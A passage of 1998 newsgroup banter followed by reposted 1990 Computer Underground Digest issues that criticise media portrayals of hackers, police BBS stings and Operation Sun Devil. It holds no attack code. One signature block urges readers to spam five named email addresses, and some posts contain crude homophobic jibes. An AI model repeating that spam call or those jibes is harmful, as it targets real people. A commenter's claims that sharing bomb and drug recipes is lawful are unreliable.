> In article <350c0e5c...@news.infi.net>, camp...@citizenet.com
> says...
> > On Sun, 15 Mar 1998 07:29:58 GMT, qui...@bigfoot.com (Harlequin)
> > wrote:
> >
> > >On Thu, 12 Mar 1998 21:51:44 GMT, Tech33 wrote:
> > <SNIP>
> > >>e pay attention to whom you are replying. Nyarl-tep was asking
> > >>that question because of a smartassed comment by Brian.
> > >>That said, nyarl could have just stopped with the question. Although,
> > >>knowing a bit more about her is nice in case we ever have to figure
> > >>out whether she's a Senator or not. ;c)
> > >
> > >Personally, I like to know a bit of background information about the
> > >people I interact with. I find that I can better relate to them if I'm
> > >aware of other dimensions of their lives and personalities. This isn't
> > >a place for detailed biographies, but a snippet of personal info here
> > >and there is interesting.
> > >
> > >H.
> >
> >
> > 1. What's your shoe size?
haha.. what does it matter since I am not male? =)
> > 2. Do you like jam or jelly better?
Ummm... Jam. Much more fruity.
> > 3. Are you a dog lover, or a cat lover?
haha... Cats are such dignified animals. Even if they DO lick their
butts like dogs.
> > 4. Are you a fan of Elvis? or the Beatles?
Neither. I think both are overrated. =(
--
Jennifer Martino
E-MAIL :
jmar...@ameritech.SPAM.THE.WONDER.WHAT.THE.HELL.IT.IS.MEAT.net
ICQ # : 6811820
WEB PAGE: "The Web Page You Have Reached"
http://www.ameritech.net/users/jmartino/index.html
Telephone sounds/recordings.
Over 125 sounds and growing!
Updated weekly!
Why not send the following people some spam? They seemed to think *I*
wouldn'd mind it.
gwanote...@ameritech.net, gwa...@aol.com, gw...@juno.com,
gw...@ameritech.net, infob...@ameritech.net
Brian Grant
Jennifer Martino wrote:
>
> > >
> > > 1. What's your shoe size?
>
> haha.. what does it matter since I am not male? =)
>
AHAH, you have obviously been taking question answering lessons from
somebody.
Jennifer Martino
Argh.. I resent that remark. =)
Jennifer Martino
Harlequin wrote:
>
> On Fri, 13 Mar 1998 01:27:29 -0500, undo wrote:
> >nyarl-tep wrote:
> >> how bout hackers who are gay?
> >> i know plenty
> >> tell you what
> >> that worm you call a dick between you legs does not make you a man
> >
> >I have reached a conclusion: You are a woman. Men do not talk about
> >each other's dicks.
haha... Ohmygawd.. haha... And they don't look at them when they are
whizzing in the urinals either. Where DO you guys look to avoid any
confrontation over that?
> So, since you say that you are a man, I deduce that
> >that means that you are "the man" in your relationship.
haha.. The way it SHOULD be.. haha
> Eh? Penises are often mentioned by men, particularly in insults. Just
> read some of the flames in this NG.
>
> I can't see any reason that nyarl-tep would have for lying. Not that
> sex or sexuality are really relevant here in the first place.
>
> H.
--
Jennifer Martino
Harlequin wrote:
> I can't see any reason that nyarl-tep would have for lying. Not that
> sex or sexuality are really relevant here in the first place.
>
> H.
It's really funny you should say that...
You see, often I dream about something I saw/read/was doing right before
I go to sleep.
Example: Last night when at my bfs, we were watching America's Most
Wanted (For you Brits, it's a show profiling the most wanted criminals
in America (Hence the name.. haha)) before we watched a movie we had
rented. There was this story about this chick who had this insane
jelousy that was amplified by her drug use. She went to this party and
like had her friends beat her up and make her less pretty because the
beatee (not the beaters) was prettier than the jealous chick and getting
more attention. Last night I drempt that that chick made this other
chick spread like rumors about me while I was sick. And it ended with
her stabbing me with a pen. Oh.. and there was TONS of homework at this
school.
In another dream, I drempt that I was in this like funhouse or something
with video games and there were a pile of student IDs on a counter. I
looked thru them and there was Harlequin. And she was female. haha..
Weird.
undo
Harlequin wrote:
>
> On Fri, 13 Mar 1998 01:27:29 -0500, undo wrote:
> >nyarl-tep wrote:
> >> now borders you have a problem with gays?
> >> how bout hackers who are gay?
> >> i know plenty
> >> tell you what
> >> that worm you call a dick between you legs does not make you a man
> >
> >I have reached a conclusion: You are a woman. Men do not talk about
> >that means that you are "the man" in your relationship.
>
> read some of the flames in this NG.
>
> sex or sexuality are really relevant here in the first place.
>
> H.
Sorry, I should have said *heterosexual* men don't talk about each
other's dicks. Heterosexual men also don't say "penises." They say
"dicks."
Si_Druid
****************************************************************************
>C O M P U T E R U N D E R G R O U N D<
>D I G E S T<
*** Volume 1, Issue #1.11 (May 29, 1990) **
****************************************************************************
MODERATORS: Jim Thomas / Gordon Meyer
REPLY TO: TK0...@NIU.bitnet
COMPUTER UNDERGROUND DIGEST is an open forum dedicated to sharing
information among computerists and to the presentation and debate of
diverse views.
--------------------------------------------------------------------
DISCLAIMER: The views represented herein do not necessarily represent the
views of the moderators. Contributors assume all responsibility
for assuring that articles submitted do not violate copyright
protections.
--------------------------------------------------------------------
In This Issue:
File 1: Moderators' Corner (news and notes)
File 2: Media and the (witch)hunt for the Computer Underground
File 3: BBS Stings (anonymously sent)
File 4: Comment on Sun Devil Press Release and other related
related views (numerous authors)
--------------------------------------------------------------------
***************************************************************
*** Computer Underground Digest Issue #1.11 / File 1 of 4 ***
***************************************************************
In this file:
-- Apology to The Well users
-- Archive Files Available
---------------------------------------------------------------
-------------------------------
APOLOGY TO WELL USERS
-------------------------------
In a recent issue of CuD we inadvertently reprinted the comments
of some users of The Well. Through a misunderstanding, we thought
we had obtained permission to reprint the entire file, but
the permission was limited. We apologize for any embarrassment this
might have caused.
CuD policy is to obtain permission to reproduce files that have
appeared elsewhere, and we do our best to uphold the norms of
etiquette that guide e-mail, ambiguous as they may sometimes be.
****************************************************************
------------------------
ARCHIVE FILES AVAILABLE
------------------------
We currently have the following archival material available:
NAME ISSUES APPROX SIZE
**E-mail Magazines**
---------------------
A.N.E. 1 -> 7 300 K total
ATI 1 -> 48 10-15 K each
CuD 1.00 -> 1.10 30 K each
LoD Tech. Jrnl 1 -> 4 175 K each
NARC 1 -> 7 5 K each
P/Hun 1 -> 5 160 K each
PHRACK 1 -> 30 150-300 K each
PIRATE 1 -> 5 170 K each
**Papers/articles**
-------------------
"The Social Organization of the Computer Underground"
(Master's thesis by Gordon Meyer)
"The Baudy World of the Byte Bandit" (paper by G. Meyer and J. Thomas)
"The Official Phreaker's Manual, 1.1 (1987)"
"The State of the Hack" (LoD)
--Transcriptions of documentaries
--Misc. news stories
We also have *numerous* individual files of newsletters/info sheets that
were started but never got beyond the first issue or two, or were issued as
single-file documents.
Our goal is to preserve this short period of computerist activity in its
documentary form for the benefit of students, scholars, and other
computerists. We will provide E-mail copies at no charge, but hard copies
will require a stamped, self-addressed envelope.
Archived materials can be obtained by dropping a short note to:
KRA...@SNYSYRV1.bitnet OR TK0...@NIU.bitnet
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** Computer Underground Digest Issue #1.11 / File 2 of 4 ***
***************************************************************
---------------------------
MEDIA AND THE (witch)HUNT FOR THE COMPUTER UNDERGROUND
---------------------------
Witch hunts are about images and social control. There have been numerous
discussions from both sides of the issue on the rhetoric depicting computer
undergrounders as a DANGEROUS EVIL in the mass media. In our view, these
depictions add to the "witch hunt" mentality by first labelling a group as
dangerous, and then mobilizing enforcement agents to exorcise the alleged
social evil.
Being good sociology types, we call this process of naming a type of
"degradation ceremony." A degradation ceremony is defined by Harold
Garfinkel as a type of "communication work" in which someone's identity is
publicly redefined and destroyed. This destruction then allows for the
"forces of good" to denounce and attack those who are now seen as socially
unacceptable. This is called SYMBOLIC transformation because those who are
degraded are SYMBOLIZED in a new, and highly negative, way. Symbols are
simply things that stand for, or indicate, something else. Words and names
are examples of symbols that, when cleverly used, can created images of
various kinds. For the computer underground, these images have been grossly
distorted.
By creating such negative imagery, it becomes easier to "sell" to the
public the view that hackers, pirates, and others, are highly dangerous.
Successful denunciations redefine the relationship between events or
behaviors and their context through manipulation of symbols that provides
new, derogatory meanings and creates moral distance between the perpetrator
and the denouncer. The ritual ceremony of degradation symbolically
redefines the computer underground and relegates them to a stigmatized--and
criminally sanctionable--category. To save space, we have omitted the
bibliography from which the following come, but it is available upon
request.
In an examination of the origins of a "crime wave" against the elderly,
Fishman (1982) illustrates the media role in formatting common events in
ways that impute to them an exaggerated regularity. The organization and
selection of topics, the association of the events with dramatic discourse,
the infusion of the events with new meanings, and subsequent
self-reinforcing perpetuation of follow-up accounts organized around a
given theme, belie the ideological character underlying the images.
Hollinger and Lanza-Kaduce (1989) argue that the criminalization of
computer abuse reflects a symbolic enterprise of education and
socialization in extending new definitions of property and privacy in which
the media played a dominant role.
Media definitions of the CU continue to invoke the inaccurate and
generalized metaphors of "conspiracies" and "criminal rings," (e.g.,
Camper, 1989; Zablit, 1989), "modem macho" evil-doers (Bloombecker, 1988),
moral bankruptcy (E. Schwartz, 1988), "electronic trespassers" (Parker:
1983) or "electronic burglars" (Rosenblatt, 1989a: 1), "crazy kids
dedicated to making mischief" (Sandza, 1984a: 17), "electronic vandals"
(Bequai: 1987), a new or global "threat" (Markoff, 1990; Van, 1989).
Others see hackers as saboteurs ("Computer Saboteur," 1988), monsters
(Stoll, 1989: 323), secret societies of criminals (WMAQ, 1990), "Hi-tech
street gangs" (Cook, 1988), "'malevolent, nasty, evil-doers' who 'fill the
screens of amateur %computer% users with pornography'" (Minister of
Parliament Emma Nicholson, cited in "Civil Liberties," 1990: 27),
"varmits" and "bastards" (Stoll, 1989: 257), and "high-tech street gangs"
("Hacker, 18," 1989). Stoll (cited in J. Schwartz, 1990: 50) has even
compared them to persons who put razorblades in the sand at beaches, a
dramatic, but hardly accurate, analogy.
A National Inquirer /(June 11, 1985: 28) reprint circulates on BBSs
claiming that several hackers fraudulently ran up a phone bill of $175,000
to a woman in one billing period. While it is true telephone abuses may
incur heavy costs, such dramatization illustrates the sensationalism of
media depictions. It is unthinkable that a phone company would not notice
such heavy activity on a private line. Further, it would require over two
dozen callers calling 24 hours a day for 31 days to generate such a bill,
and repeated attempts by BBSers to verify the story or locate the
principles were unsuccessful.
Once the degradation occurs, those degraded are more readily persecuted,
and the persecution often assumes the character of a political witch hunt.
By a witch hunt, we mean a form of repressive control and a ritualistic
mobilization of the community in search of imaginary enemies:
Political witch hunts are the ritual mechanisms that transform
individuals, groups, organizations or cultural artifacts from things
of this world into actors within a mythical universe. These rituals
are the social "hooks" that keep sacred transcendent forces present
in the lives of ordinary people and relevant for everyday
institutional transactions (Berkeson, 1977: 223).
Witch hunts possess a mythical and ritualistic character and, like all
moral crusades, they function in part to symbolize somebodies view of a
sacred order against the penetration of "profane" influences in a process
of moral revitalization. The current sweeps against the CU can be seen as
part of a broader fear of change and the reaction to it by returning to
"old fashioned values." Other examples of this tendency toward enforcing
the moral order through the criminal justice system include persecution of
those showing the Robert Maplethorpe art exhibit, the prosecution of a
female "adulteress" in Wisconsin, proposed laws against drinking that would
make it a felony for a parent to serve their 20 year old offspring a drink
in the privacy of their own home (in Illinois), the clients of prostitutes
in Wisconsin potentially liable to face confiscation of their vehicle if
they invite the prostitute into their car. . .the list goes on.
The public in general does not understand computer technology and tends to
rely on "experts" to identify villains. The media portrayal of the CU as
"evil" not only degrades, but dangerously stigmatizes. Our point is that,
under current law enforcement policies, the CU is being hunted not for the
crimes it has committed for for the symbols participants bear.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** Computer Underground Digest Issue #1.11 / File 3 of 4 ***
***************************************************************
Date: Thu, 25 May 90 21:15:01 cdt
From: rampac@ecoville..edu(Rambo Pacifist)
To: tk0jut2%niu.b...@uicvm.uic.edu
Subject: Stings and such
BEWARE OF STINGS: Law enforcement may be using stings, so be suspicious of
new boards that seem too good to be true or that are run by sysops without
references or a history of participation elsewhere. Here's a couple of
things I thought readers might be interested in.
I've stuck a few comments in parentheses and following each article.
+*++*++*++*++*++*++*++*++*++*++*++*+
From: DEDICATED COMPUTER CRIME UNITS, by J. Thomas McEwen. Washington:
U.S. Department of Justice. Appendix A, pp. 101-103, "Sting Operations."
+*++*++*++*++*++*++*++*++*++*++*++*+
While most bulletin boards have been established for legitimate purposes,
there are also "pirate" or "elite" boards that contain illegal information
or have been established to advance an illegal activity. Security on these
boards is tightly controlled by the owners. With these bulletin boards,
users usually have to contact the owner directly to obtain a password for
access to different levels of the system. A degree of trust must therefore
be established before the owner will allow access to the board, and the
owners develop "power" over who can use the system.
(Comment: Gosh, never knew I was doing all this back when I was doing
sysop! If I could only remember what I did with all that power! Guess the
guy who wrote this hasn't been on a board since the original RBBS.)
Pirate boards have been found with a variety of illegal information on
them including the following:
*Stolen credit card account numbers
*Long distance telephone service codes
*Telephone numbers to mainframe computers, including passwords
and account numbers
*Procedures for making illegal drugs
*Procedures for making car bombs
*Hacking programs
*Tips on how to break into computer systems
*Schematics for electronic boxes (e.g., black box)
(Comment: What's with this shit about "pirate boards?" If these guys can't
tell the diff between our boards, what makes them think they can figure out
what goes on there? Who do they think they're kidding? Anybody ever seen
codez posted on an elite pirate board? You can also find illegal
information in letters in the post office, on short wave bands, and in
libraries. Does that mean that these places should be shut down too?)
These boards obviously are a threat to communities, and their existence has
gained the attention of some police departments.
STING OPERATIONS WITH BULLETIN BOARDS
The experiences of the Maricopa County, Arizona, Sheriff's department and
the Fremont, California, Police Department are very instructive on how
local departments can establish their own bulletin boards and become part
of the network with other boards. Members of the Maricopa County Sheriff's
Department were the first in the country to establish such a board. Their
board resulted in over 50 arrests with the usual charge being
telecommunications fraud.
(Comment: Would this be entrapment? Think about it: Setting up a board to
entice people to commit legal acts! And they call US unethical?)
In September, 1985, the Fremont Police Department established a bulletin
board for the primary purpose of gathering intelligence on hackers and
phreakers in the area. The operation was partially funded by VISA, Inc.,
with additional support from Wells Fargo Bank, Western Union, Sprint, MCI,
and ITT.
After establishing their bulletin board, they advertised it on other boards
as the newest "phreak board" in the area. Within the first four days, over
300 calls were received onthe board. During the next three months, the
board logged over 2,500 calls from 130 regular users. Through the bulletin
board, they persuaded these groups that they had stolen or hacked
long-distance telephone service codes and credit card account numbers. They
were readily accepted and were allowed access to pirate boards in the area.
The board was operated for a total of three months. During that period,
over 300 stolen credit card account numbers and long-distance telephone
service codes were recovered. Passwords to many government, educational,
and corporate computers were also discovered on other boards.
The operation resulted in the apprehension of eight teenage in the area who
were charged with trafficking in stolen credit card acconts, trafficking in
stolen long-distance telephone service codes, and possession of stolen
property. Within the next week, seven more teenagers in California and
other states were arrrested based on information from this operation.
It was estimated that this group had been illegally accessing between ten
and fifteen businesses and institutions in California. They were regularly
bypassing the security of these systems with stolen phone numbers and
access codes. One victim company estimated that it intended to spend
$10,000 to improve its security and data integrity procedures. Other
victimized businesses were proceeding along the same lines.
-->End of Article<--
********************************************************************
We can't let this stuff pass without comment. Consider this:
1. They guy who wrote it doesn't know the difference between a pirate board
and other kinds of boards. This is supposed to be an authoritative study?
By calling any board he doesn't like a PIRATE board means that he's just
assumed that pirates steal codez. Even the phedz ought to know better,
especially if they've been investigating. Even the lamest of BBSers know
that you hardly ever find codez on a real pirate board. This kind of
ignorance is scary!
2. The list of stuff found on p/h boards may include all the stuff McEwen
sees. But, except for carding, the rest of the stuff is rarely illegal.
Possession of information is still a right, and it's generally not illegal
to explain how to hack or run numbers. Even info on making drugs or bombs
is not illegal. It's only illegal if you *DO IT!*
3. Claiming that these boards are "obviously a threat to communities"
REALLY SUCK! How many hackers have bombed buildings? Have sold drugs made
from info of a BBS? By making this claims, the police can start coming down
on any board they don't like, just because some lamer said they're
"dangerous." Sounds like the beginning of a police state.
4. How nice that a bunch of banks funded some stings. Hey, don't they have
computers of their own they can set up? How much money does it take to set
up a board? Sounds like those cops had a scam of their own going!
5. Setting up stings may not be legal entrapment (but it could be in some
instances). In rare cases, a sting might be justified if something serious
is going on. But to set up a board and collect info on users is a dangerous
breach of privacy. Even on the best elite boards I've been on, only a
fraction of the total users are involved in any illegal activity. GET THAT
YOU NARC BASTARDS? DARN FEW ARE ENGAGED IN ILLEGAL ACTIVITY!. Even in the
Freemont sting, it sounds like only a handful (8 arrests out of 130
users?!) were doing indictable stuff. Even if twice, hey, even triple, that
number were active, that's still darn few for a board that's supposed to
attract "criminals." It means the other users are just filed away in police
intelligence dossiers.
Such casual use of sting operations is undemocratic. You don't have to
support hackers to see when the cops have gone too far. Stings, raids,
confiscation without due process all suck. Oh-here's a laugh! The phedz
distinguish between "confiscation," a legal term that means you've a crook
and you can have your property taken away, and stuff they take while
searching for evidence. They say they don't confiscate stuff they take in a
raid, because you get it back eventually. But unless I'm missing something,
the pigs still went in and took your stuff, and you don't have, you can't
get it, and you can't even get copies of crucial programs you may need.
Call it what you want, they grab it!
We're coming closer to a police state, NOT because there's a crackdown on
hackers, but because the way it's being done is dangerous. They're treating
anything they don't like about computer users like they do drug crimes, and
even using drug laws.
There's a good article in the New York Times (May 6, 1990: Section E, p. 5)
on how the drug war is eroding our rights. Current police tactics won't
lead to more respect for law, but to cynicism and growing disrespect.
Agents claim that computer abuse is creating a new generation of immoral
citizens. Maybe, but law enforcement abuse is creating a much larger
population of suspicion of "rights" and disrespect for repressive law.
Here's another pro-sting rap by Ken Rosenblatt, the long-time
hard-ass prosecutor in San Jose:
+*++*++*++*++*++*++*++*++*++*++*++*+
From: "Deterring Computer Crime," by Kenneth Rosenblatt. From the
Department of Justice's Computer Crime Conference in September, 1989,
pages 9-10.
+*++*++*++*++*++*++*++*++*++*++*++*+
In addition to investigating computer trespass and thefts after they
occur, local task forces would have the manpower and expertise to
concentrate on "bulletin board infiltrations." Many legitimate computer
users communicate with each other via "bulletin boards." Those boards
consist of a single computer operated by an organization, such as a
computer users group. Members access these boards by telephone with their
own computers to exchange information. (Commercial databases are
essentially large bulletin boards which charge members for access).
Cyberpunks operate so-called "pirate" bulletin boards. Those boards
frequently offer stolen information to a select gropu willing to contribute
same. These boards can be treasure troves of stolen passwords, telephone
access cards, credit card numbers, and illegally copied software.
Although these "pirate" boards are usually open to the public, the
illegal information can only be accessed by persons given special passwords
by the operators of those boards. With patience, skilled police officers
using their own computers can convince cyberpunks that they are similarly
inclined toard mischief and gain their confidence and access to those
"secret levels." Police then obtain search warrants for telephone records,
obtain the operator's home address, and seize the computer containing the
stolen credit card numbers. Task forces can run their own fake "pirate"
boards, allowing "cyberpunks" to provide them with illegal information.
Telephone traps reveal the source of the information and the criminal.
Local task forces will become familiar with local boards.
-->End of Article<--
+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*++*++*++*++*++*++*++*++*++*++*++*+
Commentary:
1. This guy is totally out of touch with reality. Cyberpunks operate pirate
boards? Hasn't he ever read Cyberpunk Magazine or been on a cyboard?
Doesn't he know that you get passwords when you log on a system? Sure, a
few boards may have pws to get you around, but usually access levels are
determined in config settings. Maybe it seems petty, but this kind of
blatant ignorance shows that this guy, one who's saying he should nail all
us computer bad guys, doesn't have even the most basic info about what it
is he's after. Does that scare anybody else besides me?
2. These so-called "treasure troves" of illegal information are usually
more often false info, old info, or just something that's been made up by
kids with phallic insecurity who want to show off. Yeh, yeh, I know;
there's some really fine stuff out there. But not that much, and you can't
go around busting boards just 'cause some bozos are gaming it up.
3. This stuff about setting up fake boards sounds like they're trying to
create crime to justify having jobs that let them play with computers.
There was a story, I think it was in Todd Gitlin's book about the sixties,
when a bunch of lefties at at SDS conference set up a "how to bomb"
session. All the other lefties knew it was a joke to see how many phedz
would show up, so they stayed away. Sure 'nuff, a bunch of short haired,
wing-tipped "hippy lookin' dudez" attended it. Maybe we ought to set up a
few fake boards of our own and get these sting types hooked on hacking.
Think about it!
-->Commentary by Rambo Pacifist<--
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** Computer Underground Digest Issue #1.09 / File 4 of 4 ***
***************************************************************
------------------------
At least five different people contributed to the following
independently of each other. The moderators edited the comments
and added a few transitions to turn them into a single file.
------------------------
Folksinger Woody Guthrie was once asked by the "Ladies' Auxiliary" to write
a song about them and get the name of their group in as many times as he
could. In sarcastic jest, he did, slipping it into almost every line. The
Secret Service press release and the prepared statement by SS Assistant
Director Garry M. Jenkins describing Operation Sun Devil (OSD) (they can't
decide whether it's one or two words in their release) would have made
Woody smile.
Typical of self-serving witch hunting documents, the release extols the
virtues of the Secret Service's vigilance against the social threat of the
dreaded computer underground. Both make sure the public knows who is in
charge, who is doing saving, and who is on the front line protecting
rights.
Typical of witch hunting documents, it alludes, without facts, to a serious
harm of substantial magnitude. Both identify a general menace, computer
crime, and then, through subtle twists of phrase, lump a variety of illegal
activities into a broad category called COMPUTER CRIME. From there, it
takes only minimal effort to depict a national threat from which the SS
will save us:
The Secret Service will continue to investigate aggressively
those crimes which threaten to disrupt our nation's businesses
and government services (Garry M. Jenkins, OSD prepared statement).
There are clearly computer-related crimes that require vigorous
investigation, prosecution, and punishment. However, judging from the
knowledge of the CU displayed by prosecutors--as revealed in their press
releases, public and other interviews, conference papers, and published
articles--few law enforcement officials are sufficiently familiar with the
CU to be able to distinguish between crime, abuse, and legitimate
Constitutionally-protected communications. When even experienced
prosecutors or researchers (e.g., Kenneth Rosenblatt's presentations to the
NIJ Computer Crime Conference, 1989; McEwen's book, "Dedicated Computer
Crime Units," NIJ, 1989) call ALL boards they dislike "pirate" boards and
are unaware of the fundamental differences between CU groups (hackers,
pirates, cyberpunks), how can we have *any* confidence in their scare
tactics that raise images of computer demons running amok? These are not
mere quibbles over semantics, but raise fundamental (and frightening)
issues of the competency of these people to protect innocent parties or or
identify real threats.
The press release re-affirms the commitment of the SS and others to protect
"private and governmental agencies which have been targeted by computer
criminals." To the average citizen, this may sound re-assuring.
Unfortunately, and the irony surely is lost on the SS, OSD indeed
"exemplifies the commitment" of federal agencies, and it is a commitment
quite unconcerned with individual rights.
Crimes commited with computers are wrong. Period! But, there are existing
laws against fraud, whether through illegal use of long distance access
codes or credit cards. It is certainly dangerous to muck about in hospital
records, and trashing others' computers or files is clearly potentially
serious. However, few p/h types engage in such behavior, contrary to
whatever "facts" in possession of the SS. Perhaps the targets of OSD have
ripped off $50 million as some sources have reported. But when asked for
concrete estimates of the losses or for the formula by which they
calculated it, they remain silent. Clifford Stoll misleadingly links
hackers and virus spreaders in THE CUCKOO'S EGG.
Jenkins claims that some hackers move on to plant computer viruses. Sounds
dangerous, right? But, by definition, creating and planting a virus
requires knowledge of programming and computer entry, and to equate
computer underground activity with viruses is like equating learning to
drive a car with drunken driving. "Hey! Some drivers move on to other
destructive activities, like bank robbery, so let's stamp out drivers!"
Perhaps a hacker or two might plant a virus. But virus-spreaders are
considered irresponsible, and they affect *ALL* members of the
computer-using community, and virus planting is not something accepted
among the computer underground, period!
Perhaps they have arrested 9,000 computer abusers as implied by Jenkins'
comments, but when asked, sources with I have spoken cannot give a figure
and indicate they cannot even begin to estimate the number of "hackers"
arrested.
The SS assumes anybody involved in a computer crime is a computer
undergrounder out to subvert democracy. Unfortunately, the only members they
come in contact with are those whom they suspect of wrong-doing or who might
possess evidence of it. This gives them an understandably distorted view.
However, rather than critically examine their own views, they proceed as if everybody
is equally guilty, which feeds the media and public hysteria.
Let's take an
example. RipCo, a Chicago computer underground board, had 606 users when
it was raided. A scan of RipCo's message logs over a six month period indicates that,
at most, barely three percent of the callers could even remotely be
classified as "illegal users," as defined by the posting of codez or other
information of a questionable nature. Of these, about half of the message
content was clearly erroneous or fraudulent, suggesting that the caller
either made up the information or posted information so old as to be
irrelevant. It is also possible that some of the postings were by law
enforcement agents attempting to insinuate themselves into build credibility
for themselves. On no-longer operative "hard-core" elite p/h boards, we
have found that even on the higher access levels, a surprisingly small number
of participants actually engaged in significant criminal activity of the type
that would warrant an investigation.
Yes, some CU types do commit illegal acts. And five years ago, perhaps
more did. If the SS confined itself to prosecuting substantive crimes, we
would not complain much. Currently, however, they are sweeping up
the innocent by closing down boards, intimidating sysops of legitimate boards,
creating a chilling effect for speech, and confiscating equipment of those
unfortunate enough to be in the way.
We are hardly romanticizing criminal behavior. Carding is wrong, violating
the privacy of others is unethical, and obtaining goods or services
fraudulently is illegal. But the SS is throwing out the baby with the
bath water and irresponsibly fueling the fires of public hysteria with
inflammatory rhetoric and inappropriate zealousness.
What do we suggest be done about computer abuse? The following is hardly a
complete list, but only a suggestive framework from which to begin thinking
about alternatives.
1. There are already sufficient laws to prosecute fraud. We do not need
more, as some prosecutors have called for. There is no sense in passing
more laws or in strengthening existing laws relating to computer crime.
The danger is the creation of more law so broad that misdemeanors can be
prosecuted as felonies. We reject passing more laws because of the
potential for infringing Constitutional rights.
2. Educate, don't inflame, the public. The best protection against computer
invasion, whether by a hacker or virus spreader, is secure passwords,
trustworthy diskettes, and backed up files. Computer literacy is a
first line of defense.
3. Educate computer users early into the computer underground ethic of
hackers and pirates. That ethic, which encourages respect for the
property and privacy of others, has broken down in recent years. Too
many in the new generation are coming into the culture with an "I want
mine" attitude that is selfish and potentially destructive.
4. We agree with law enforcement officials who say that some of the younger
abusers show early behavioral signs of potential abusive use. Parents
should be made aware of these signs, but in a responsible manner, one
that does not assume that any computer lover is necessarily a potential
criminal.
5. Move away from criminalizing all forms of abuse as if they were alike.
They are not. Even if a harm has occured, civil courts may, in at least
some cases, be more appropriate for processing offenders. Both adults
and juveniles should be channelled into diversion programs that
includes community service or other productive sanctions.
6. Recognize that computer use *CAN* become obsessive. Although there is a
fine line to tread here, the problem of "computer addiction" should be
treated, not punished.
7. For minor offenses of juveniles, counselling with offender and parents
may be more appropriate than punishment.
8. If criminal sanctions are imposed, community service could be more
widely used rather than the harsh punishments some observers demand.
These are just a few of the possible responses to computer abuse. One need
not agree with all, or any, to recognize that it is possible to both
appreciate the computer underground while not tolerating serious abuses.
The computer underground should be recognized as symptomatic of social
changes in ethics, technology, societal attitudes, and other factors, and
not simply as a "crime" that can be eradicated by going after alleged
culprits. Solutions to abuse require an examination of the entire social
fabric, to include how we try to control those we don't like.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
END C-u-D, #1.11 +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
!
--
Si
Si_Druid
****************************************************************************
>C O M P U T E R U N D E R G R O U N D<
>D I G E S T<
*** Volume 1, Issue #1.12 (June 10, 1990) **
****************************************************************************
MODERATORS: Jim Thomas / Gordon Meyer
REPLY TO: TK0...@NIU.bitnet
COMPUTER UNDERGROUND DIGEST is an open forum dedicated to sharing
information among computerists and to the presentation and debate of
diverse views.
--------------------------------------------------------------------
DISCLAIMER: The views represented herein do not necessarily represent the
views of the moderators. Contributors assume all responsibility
for assuring that articles submitted do not violate copyright
protections.
--------------------------------------------------------------------
In This Issue:
File 1: Moderators' Corner (news and notes)
File 2: From the Mail Bag
File 3: Another CUCKOO'S EGG Review (By Charles Stanford)
File 4: Pat Townson Interview with David Tomkin (reprint)
File 5: Where are they Now? (Tracing CU Magazines)
--------------------------------------------------------------------
***************************************************************
*** Computer Underground Digest Issue #1.11 / File 1 of 5 ***
***************************************************************
In this file:
-- FTP instructions
-- Policy Statement (revisited)
---------------------------------------------------------------
-------------------------------
FTP INSTRUCTIONS
-------------------------------
Here is a script of a login via ftp.
You can get a directory by specifying the CuD directory
in the path (ie... ftp> dir tmp/ftp/CuD.)
# ftp 128.95.136.2
Connected to 128.95.136.2.
220 blake FTP server (Version 4.174 Sat Apr 1 06:11:40 PST 1989) ready.
Name (128.95.136.2:llo): anonymous
331 Guest login ok, send ident as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> bin
200 Type set to I.
ftp> mget tmp/ftp/CuD/*
ftp> bye
221 Goodbye.
# uncompress CuD_1.*
That should do it.
:NOTE: The above command 'mget CuD*' will retrieve all of that publication.
You could just as easily type: 'cd tmp/ftp/CuD' and then 'ls' or 'dir' to
see the files available to choose from.
********************************************************************
-----------------------
CuD POLICY REVISITED
----------------------
We remind contributors to be sure that copyrights are not violated. We
have been unable to reprint some news stories because they risk going
beyond fair use doctrine on copyright stories. For the time being, we are
also restricting some files until legal issues surrounding them are
resolved. Unfortunately, prosecutors are less than open about what
constitutes an "illegal file," so we are erring on the side of caution.
This is one example of the CHILLING EFFECT. The legality of information
dissemination is decided after the fact, leaving sysops, moderators, and
others, in a rather precarious state.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** Computer Underground Digest Issue #1.12 / File 2 of 5 ***
***************************************************************
----------
IN THIS FILE:
1) Clarifying the CU
2) State of CU law in Canada
------------
-----------
%The author of this note requested anonymity. His comments indicate
the importance of clarifying what computer hobbyists are all about.%
------------
It is kinda strange,the first thing I read about hacking was Stoll's
"Cuckoo's Egg" and while reading I felt uncomfortably torn between these
"monster's and ogres" as he called them and my sense of right and wrong. I
definately felt drawn toward the hackers, but felt as if I was wrong for
feeling that way. Everything I have ever heard about hacking was put in a
negative light. Criminals, vandals etc.
My recent exposure to the world of computers has been, in retrospect, very
enlightening. I immediately upon working with computers at work dove into
books about DOS and such. I constantly sought ways around our menu system,
